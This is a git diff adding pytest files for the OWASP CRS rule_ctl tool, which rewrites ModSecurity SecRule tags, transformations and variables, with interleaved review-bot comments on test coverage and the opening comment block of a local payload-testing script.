"--remove-tag", "foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, 
rule_string) + assert expected == get_output(context) + + def test_remove_tag_skip_chain(self): + arguments = [ + "--remove-tag", "foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:foo,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "tag:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRenameTag: + def test_rename_tag_with_no_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_rename_tag_with_existing_tags(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_with_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'bar'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_rename_tag_skip_chain(self): + arguments = [ + "--rename-tag", "foo,bar", + "--skip-chain" + ] + rule_string = 
""" +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'bar',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'foo'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestSortTags: + def test_sort_tags(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_with_chain(self): + arguments = [ + "--sort-tags" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ + tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'alpha',\\ + tag:'foo',\\ + tag:'omega'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_sort_tags_skip_chain(self): + arguments = [ + "--sort-tags", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'omega',\\ + tag:'foo',\\ + tag:'alpha',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "id:12,\\ + tag:'alpha',\\ + tag:'foo',\\ 
+ tag:'omega',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" \\ + "tag:'omega',\\ + tag:'foo',\\ + tag:'alpha'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py new file mode 100644 index 00000000..f7114cea --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_test.py 
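Review bot: The `TestRemoveTag` cases only ever remove an unquoted `tag:foo`, while the append, rename and sort cases all work on the quoted form `tag:'foo'` that real CRS rules use; if the removal path compares the raw action value, a quoted tag would survive `--remove-tag foo` and that gap is not covered by these tests. Adding one case with a quoted fixture, `SecRule ARGS "@rx foo" "id:12,tag:'foo'"` expected to become `SecRule ARGS "@rx foo" "id:12"`, would close it. Whether the tool already strips quotes on removal cannot be told from this hunk, so the test is worth adding either way.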
@@ -0,0 +1,195 @@ +from .helpers import * + +class TestFilterRuleId: + def test_filter_rule_id_exact_match(self): + arguments = [ + "--filter-rule-id", "12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_prefix_match(self): + arguments = [ + "--filter-rule-id", "^12", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_suffix_match(self): + arguments = [ + "--filter-rule-id", ".*22$", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:122,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_filter_rule_id_no_match(self): + arguments = [ + "--filter-rule-id", "11", + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestLineNumbers: + def test_line_numbers_identical(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" + +SecRule ARGS "@rx bar" "id:13" +""" + expected = """ + +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,tag:'foo'" + +SecRule ARGS "@rx bar" "id:13,tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def 
test_line_numbers_shifted_down(self): + arguments = [ + "--append-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_line_numbers_shifted_up(self): + arguments = [ + "--remove-tag", "foo" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:foo" + +SecRule ARGS "@rx bar" \\ + "id:13,\\ + tag:foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" + +SecRule ARGS "@rx bar" \\ + "id:13" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestTargetFile: + def test_target_file(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--target-file", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) + + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() + + def test_target_file_uses_config_as_default(self, tmp_path): + import os + from rule_ctl import write_output + + file_path = str(tmp_path / 'foo.conf') + arguments = [ + "--append-tag", "foo", + "--config", file_path + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + tag:'foo'" +""" + + context = create_context(arguments, rule_string) + write_output(context) 
+ + assert os.path.exists(file_path) + with open(file_path, 'r') as h: + assert expected.rstrip() == h.read() diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py new file mode 100644 index 00000000..f1db898f --- /dev/null +++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_transformations_test.py 
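Review bot: `TestFilterRuleId` shows `--filter-rule-id` is a regex (`^12`, `.*22$`), but the case named `test_filter_rule_id_exact_match` never asserts that a bare `"12"` does NOT match `id:122` or `id:1234`; if the filter uses an unanchored search, a bare id silently selects every rule whose id contains that substring, which for a tool that rewrites CRS rule files is exactly the failure mode that needs a negative test, e.g. `"--filter-rule-id", "12"` against `"id:122"` with `expected = rule_string`. In `TestTargetFile`, `assert expected.rstrip() == h.read()` encodes that the rewritten file loses its trailing newline (write_output joins with `"\n"` and writes nothing after the last line); if that is intended it deserves a comment, `# write_output does not emit a final newline`, otherwise it is a write_output bug the test is currently locking in. The `import os` and `from rule_ctl import write_output` inside both test bodies belong at module top with the other imports.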
@@ -0,0 +1,281 @@ +from .helpers import * + +class TestAppendTfunc: + def test_append_tfunc_with_no_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_existing_transformations(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_tfunc_with_duplicate_transformation(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:lower,\\ + t:urlDecode" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_in_correct_order(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + log:'log',\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + capture,\\ + t:lower,\\ + log:'log',\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_with_chain(self): + arguments = [ + "--append-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule 
ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_tfunc_skip_chain(self): + arguments = [ + "--append-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveTfunc: + def test_remove_tfunc_with_no_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_tfunc_with_existing_transformations(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_with_multiple_args(self): + arguments = [ + "--remove-tfunc", "lower", + "--remove-tfunc", "decodeUrl" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12" +""" + context = create_context(arguments, rule_string) + assert 
expected == get_output(context) + + def test_remove_tfunc_with_chain(self): + arguments = [ + "--remove-tfunc", "lower", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_skip_chain(self): + arguments = [ + "--remove-tfunc", "lower", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + t:lower,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:decodeUrl,\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "t:decodeUrl,\\ + t:lower" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_tfunc_retains_correct_line_numbers(self): + arguments = [ + "--remove-tfunc", "lowercase" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,t:lowercase,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + t:none,\\ + msg:'PHP Injection Attack: PHP Script File Upload Found'" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py new file mode 100644 index 00000000..48923aaf --- /dev/null 
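Review bot: The fixtures in this module mix `t:lower` and `t:decodeUrl`, which are not ModSecurity transformation names, with `t:lowercase` and `t:urlDecode`, which are (`test_remove_tfunc_retains_correct_line_numbers` and `test_append_tfunc_with_duplicate_transformation` use the real ones); the tool evidently does not validate names since the assertions pass either way, but fixtures that look like real rules get copied, so using `lowercase`/`urlDecode` throughout avoids teaching readers names that ModSecurity will reject at load time. If name validation is deliberately out of scope for rule_ctl, a comment at the top of the class saying so, `# rule_ctl treats t: values as opaque strings; names are not validated`, would make the mixed fixtures unsurprising.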
+++ b/nginx/config/owasp-crs/util/rule_ctl/tests/rule_ctl_variables_test.py 
@@ -0,0 +1,327 @@ +from .helpers import * + +class TestAppendVariable: + def test_append_variable_with_one_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_existing_variables(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_duplicate_variable(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_variable_with_multiple_args(self): + arguments = [ + "--append-variable", "XML", + "--append-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML|DURATION "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_with_chain(self): + arguments = [ + "--append-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_append_variable_skip_chain(self): + arguments = [ + "--append-variable", "XML", + 
"--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar|XML "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestRemoveVariable: + def test_remove_variable_with_no_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_existing_variable(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_remove_variable_with_multiple_args(self): + arguments = [ + "--remove-variable", "XML", + "--remove-variable", "DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_with_chain(self): + arguments = [ + "--remove-variable", "XML", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + def test_remove_variable_skip_chain(self): + arguments = [ + "--remove-variable", "XML", + 
"--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceVariable: + def test_replace_variable_name_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_multiple_args(self): + arguments = [ + "--replace-variable", "XML,ARGS:xml", + "--replace-variable", "DURATION,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|DURATION|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_name_with_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + 
assert expected == get_output(context) + + + def test_replace_variable_name_skip_chain(self): + arguments = [ + "--replace-variable", "XML,DURATION", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|DURATION|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_no_variable(self): + arguments = [ + "--replace-variable", "XML,DURATION", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_existing_variable(self): + arguments = [ + "--replace-variable", "XML,!DURATION:half-life", + ] + rule_string = """ +SecRule ARGS|XML|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|!DURATION:half-life|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_multiple_args(self): + arguments = [ + "--replace-variable", "&XML,ARGS:xml", + "--replace-variable", "!DURATION:half-life,ARGS:duration", + ] + rule_string = """ +SecRule ARGS|&XML|ARGS:foo|!DURATION:half-life|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:xml|ARGS:foo|ARGS:duration|!ARGS:bar "@rx foo" "id:12" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_with_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + 
expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_variable_skip_chain(self): + arguments = [ + "--replace-variable", "!XML:'lisa',&DURATION:\"bart\"", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + expected = """ +SecRule ARGS|&DURATION:\"bart\"|ARGS:foo|!ARGS:bar "@rx foo" "id:12,chain" + + SecRule ARGS|!XML:'lisa'|ARGS:foo|!ARGS:bar "@rx foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) diff --git a/nginx/config/owasp-crs/util/send-payload-pls.sh b/nginx/config/owasp-crs/util/send-payload-pls.sh new file mode 100755 index 00000000..168736a0 --- /dev/null +++ b/nginx/config/owasp-crs/util/send-payload-pls.sh 
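Review bot: `test_replace_variable_with_no_variable` in `TestReplaceVariable` is byte-for-byte the same test as `test_replace_variable_name_with_no_variable` (same `--replace-variable XML,DURATION` arguments, same rule string, `expected = rule_string`), so it adds no coverage; either drop it or give it a collection-style replacement such as the `!DURATION:half-life` form the other `test_replace_variable_*` cases exercise. `from .helpers import *` hides where `create_context` and `get_output` come from; `from .helpers import create_context, get_output` is clearer and keeps the linter useful. This file appears to be an upstream CRS test copied verbatim, so these are points to carry upstream unless the `util/` tree is trimmed from the vendored copy.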
@@ -0,0 +1,171 @@ +#!/bin/bash +# +# Script to post a payload against a local webserver at each paranoia level. +# +# Note: Webserver has to be prepared to take desired PL as Request Header "PL". +# +# WARNING: Setting the paranoia level using a header without proper +# authentication and authorization is extremely dangerous, and is not +# recommended for production. +# +# Check how to use the Christian Folini's Apache access log format at: +# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/ +# +# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \ +# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ +# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ +# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ +# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ +# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended +# +# This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in +# the access log, if this does not match your LogFormat the script won't work +# For better results set the SecDefaultAction to 'pass'. 
